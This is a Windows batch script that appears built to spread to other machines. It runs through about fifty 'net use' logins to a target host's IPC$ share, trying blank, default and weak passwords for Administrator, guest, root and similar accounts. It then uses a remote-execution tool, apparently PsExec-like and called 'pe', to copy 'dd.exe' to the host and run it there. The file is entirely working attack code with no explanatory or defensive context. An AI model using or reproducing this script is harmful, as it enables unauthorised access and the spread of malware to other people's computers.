@echo off
net use \\%1\ipc$ "" /user:Administrator
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "" /user:guest
net use \\%1\ipc$ "" /user:Guest
net use \\%1\ipc$ "" /user:temp
net use \\%1\ipc$ "" /user:Temp
net use \\%1\ipc$ "" /user:root
net use \\%1\ipc$ "" /user:ROOT
net use \\%1\ipc$ "12345" /user:Administrator
net use \\%1\ipc$ "zzzzz" /user:Administrator
net use \\%1\ipc$ "xxxxx" /user:Administrator
net use \\%1\ipc$ "Admin" /user:Administrator
net use \\%1\ipc$ "guest" /user:guest
net use \\%1\ipc$ "2002" /user:Administrator
net use \\%1\ipc$ "abc123" /user:Administrator
net use \\%1\ipc$ "temp" /user:Administrator
net use \\%1\ipc$ "Administrator" /user:Administrator
net use \\%1\ipc$ "login" /user:Administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "temp" /user:Temp
net use \\%1\ipc$ "root" /user:Administrator
net use \\%1\ipc$ "adm" /user:Administrator
net use \\%1\ipc$ "2003" /user:Administrator
net use \\%1\ipc$ "default" /user:Administrator
net use \\%1\ipc$ "student" /user:student
net use \\%1\ipc$ "admin" /user:Admin
net use \\%1\ipc$ "admin" /user:admin
net use \\%1\ipc$ "sex" /user:Administrator
net use \\%1\ipc$ "hack" /user:administrator
net use \\%1\ipc$ "pc" /user:Administrator
net use \\%1\ipc$ "computer" /user:Administrator
net use \\%1\ipc$ "cafe" /user:Administrator
net use \\%1\ipc$ "coffee" /user:Administrator
net use \\%1\ipc$ "school" /user:Administrator
net use \\%1\ipc$ "boy" /user:ROOT
net use \\%1\ipc$ "girl" /user:Administrator
net use \\%1\ipc$ "man" /user:administrator
net use \\%1\ipc$ "sweet" /user:Administrator
net use \\%1\ipc$ "love" /user:Administrator
net use \\%1\ipc$ "2004" /user:administrator
net use \\%1\ipc$ "2005" /user:Administrator
net use \\%1\ipc$ "mirc" /user:administrator
net use \\%1\ipc$ "script" /user:Administrator
net use \\%1\ipc$ "irc" /user:administrator
net use \\%1\ipc$ "arab" /user:Administrator
net use \\%1\ipc$ "english" /user:administrator
net use \\%1\ipc$ "teacher" /user:Administrator
net use \\%1\ipc$ "student" /user:administrator
net use \\%1\ipc$ "user" /user:Administrator
net use \\%1\ipc$ "x" /user:administrator
net use \\%1\ipc$ "a" /user:Administrator
net use \\%1\ipc$ "xxx" /user:administrator
pe \\%1 attrib.exe -r dd.exe
pe \\%1 -f -c -d dd.exe -o
pe \\%1 -d dd.exe -o
goto end
:end